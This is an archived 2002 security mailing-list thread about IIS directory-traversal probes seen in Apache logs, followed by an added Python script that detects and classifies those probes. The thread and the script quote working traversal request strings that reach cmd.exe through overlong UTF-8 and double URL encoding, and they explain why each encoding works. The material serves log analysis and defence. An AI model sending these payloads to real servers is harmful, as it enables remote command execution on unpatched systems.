[unisog] increasing cmd.exe port 80/tcp probes

Mike Powell mpowell at mijk.dnsalias.com
Mon Jun 3 09:12:21 GMT 2002


Hi

They are attempts at the IIS UTF/UNICODE directory traversal exploit.
Shouldn't be a worry if you're fully patched. They usually originate
from somebody's home machine which has been infected (apparently).

I'm seeing a lot of this, and also Nimda and Code Red on a daily basis.

Mike Powell
Barry College
Wales


-----Original Message-----
From: Jeff Anderson-Lee [mailto:jonah at eecs.berkeley.edu] 
Sent: 02 June 2002 18:05
To: unisog at sans.org
Subject: [unisog] increasing cmd.exe port 80/tcp probes

Starting on Jan 5, 2002 I've been noticing some particular probes
appearing regularly in my apache logs.  There are two patterns of
note.  The first is a single probe:

    "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir"

and the second is a pair of probes:

    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1"
    "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1"

At first, seeing a new host with one of these probe patterns was a
weekly event, then later about once a day.  However in the past
thirty-six hours I've started to see a sudden rise in the incidence of
new hosts scanning with the first pattern:

dlp:X.uniweb.net.co [200.24.X.X] - - [31/May/2002:22:39:46 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:136.145.X.X [136.145.X.X] - - [31/May/2002:22:43:07 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.tricornet.com [207.190.X.X] - - [31/May/2002:23:12:43 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.stny.rr.com [24.169.X.X] - - [31/May/2002:23:31:09 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.mfr.com [216.223.X.X] - - [01/Jun/2002:05:50:48 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.losangeles-ics.com [63.68.X.X] - - [01/Jun/2002:05:55:26 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.aplikacie.sk [212.55.X.X] - - [01/Jun/2002:07:51:02 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.globetrotter.net [142.169.X.X] - - [01/Jun/2002:11:51:16 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.encompserv.com [63.160.X.X] - - [01/Jun/2002:14:11:48 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.k12.al.us [216.109.X.X] - - [01/Jun/2002:21:08:52 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:X.atl.client2.attbi.com [24.98.X.X] - - [01/Jun/2002:21:27:15 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:208.255.X.X [208.255.X.X] - - [01/Jun/2002:21:35:05 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:128.173.X.X [128.173.X.X] - - [02/Jun/2002:04:53:12 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))


Has anyone else noticed these patterns in their logs?  
Does anyone know if a virus/worm has been identified with this
probing pattern?

Jeff Anderson-Lee
System Manager, Digital Library Project
ERL, UC Berkeley
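The three probe shapes quoted in the thread differ only in how the path separator is smuggled past a server-side path check: "%255c" is a percent-encoded "%5c", which a server that decodes twice turns into a backslash; "%c0%af" is an overlong two-byte UTF-8 encoding of "/", which a strict decoder rejects but a lax one accepts; ".%252e" is the same double-encoding trick applied to the dot. The script below is an added example, not code from the thread or from either poster. It parses log lines in the format shown above, decodes each request target the way a lax server might (repeated percent-decoding, overlong UTF-8 folded to ASCII, backslash treated as a separator), and reports the requests whose ".." segments climb above the web root. The sample log lines are constructed to match the post's layout, with documentation addresses; the regex, the decode rules and the technique labels are this example's own choices.

```python
"""Classify IIS-style cmd.exe traversal probes found in web-server logs.

Added example; not code from the unisog thread.  The log format is the one
quoted in the post (host [ip] - - [ts] "request" status size ((- -> ...))),
the sample lines below are constructed, and the technique labels are this
example's own naming.
"""
from __future__ import annotations

import re
import urllib.parse
from dataclasses import dataclass

# Constructed sample lines; hosts and addresses are documentation values.
SAMPLE_LOG = r'''dlp:host.example.net [192.0.2.10] - - [31/May/2002:22:39:46 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
dlp:host.example.org [198.51.100.7] - - [01/Jun/2002:05:50:48 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 3234 ((- -> /scripts/..%c0%af../winnt/system32/cmd.exe))
dlp:host.example.org [198.51.100.7] - - [01/Jun/2002:05:50:49 -0700] "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 3234 ((- -> /scripts/.%2e/.%2e/winnt/system32/cmd.exe))
dlp:host.example.com [203.0.113.5] - - [02/Jun/2002:04:53:12 -0700] "GET /index.html HTTP/1.0" 200 1234 ((- -> /index.html))
'''

# Assumed line layout, modelled on the lines quoted in the post.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \[(?P<ip>[^\]]+)\] \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Two-byte UTF-8 sequences with lead byte 0xC0/0xC1 are overlong encodings of
# ASCII (e.g. C0 AF -> '/').  A strict decoder rejects them; a lax one does not.
OVERLONG_RE = re.compile(rb"[\xc0\xc1][\x80-\xbf]")


def _fold_overlong(m: re.Match[bytes]) -> bytes:
    lead, cont = m.group()
    return bytes([((lead & 0x1F) << 6) | (cont & 0x3F)])


def normalize(target: str, max_rounds: int = 3) -> tuple[str, int, bool]:
    """Decode the path part of a request target the way a lax server might:
    percent-decode repeatedly until stable, accept overlong UTF-8, and treat
    backslash as a separator.  Returns (path, decode_rounds, saw_overlong)."""
    cur = target.split("?", 1)[0]
    rounds, overlong = 0, False
    while rounds < max_rounds:
        raw = urllib.parse.unquote_to_bytes(cur)
        raw, n = OVERLONG_RE.subn(_fold_overlong, raw)
        overlong = overlong or n > 0
        nxt = raw.decode("utf-8", errors="replace")
        if nxt == cur:
            break
        cur, rounds = nxt, rounds + 1
    path = re.sub(r"/+", "/", cur.replace("\\", "/"))
    return path, rounds, overlong


def escapes_root(path: str) -> bool:
    """True if resolving '..' segments ever climbs above the starting directory."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def classify(target: str) -> str | None:
    """Label a request target, or return None if it stays inside the web root."""
    path, rounds, overlong = normalize(target)
    if not escapes_root(path):
        return None
    if overlong:
        enc = "overlong-utf8"
    elif rounds >= 2:
        enc = "double-encoded"
    elif rounds == 1:
        enc = "url-encoded"
    else:
        enc = "plain"
    what = "cmd.exe traversal" if "cmd.exe" in path.lower() else "directory traversal"
    return f"{enc} {what}"


@dataclass
class Finding:
    ip: str
    target: str
    path: str
    technique: str
    status: int


def scan(log_text: str) -> list[Finding]:
    """Parse each log line and return the requests that escape the web root."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = m["req"].split()  # method, target, optional HTTP version
        if len(parts) < 2:
            continue
        technique = classify(parts[1])
        if technique:
            findings.append(Finding(m["ip"], parts[1], normalize(parts[1])[0],
                                    technique, int(m["status"])))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ip:15} {f.status} {f.technique:32} {f.path}")
```

All three probe shapes normalize to the same path, /scripts/../../winnt/system32/cmd.exe, which is why they are one attack with three encodings rather than three attacks. The 404 in every quoted line is Apache reporting that no such file exists; the classifier says what was attempted, not whether the sender succeeded anywhere else, and a request that traverses but stays under the root (for example /scripts/../winnt/...) is deliberately not flagged.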
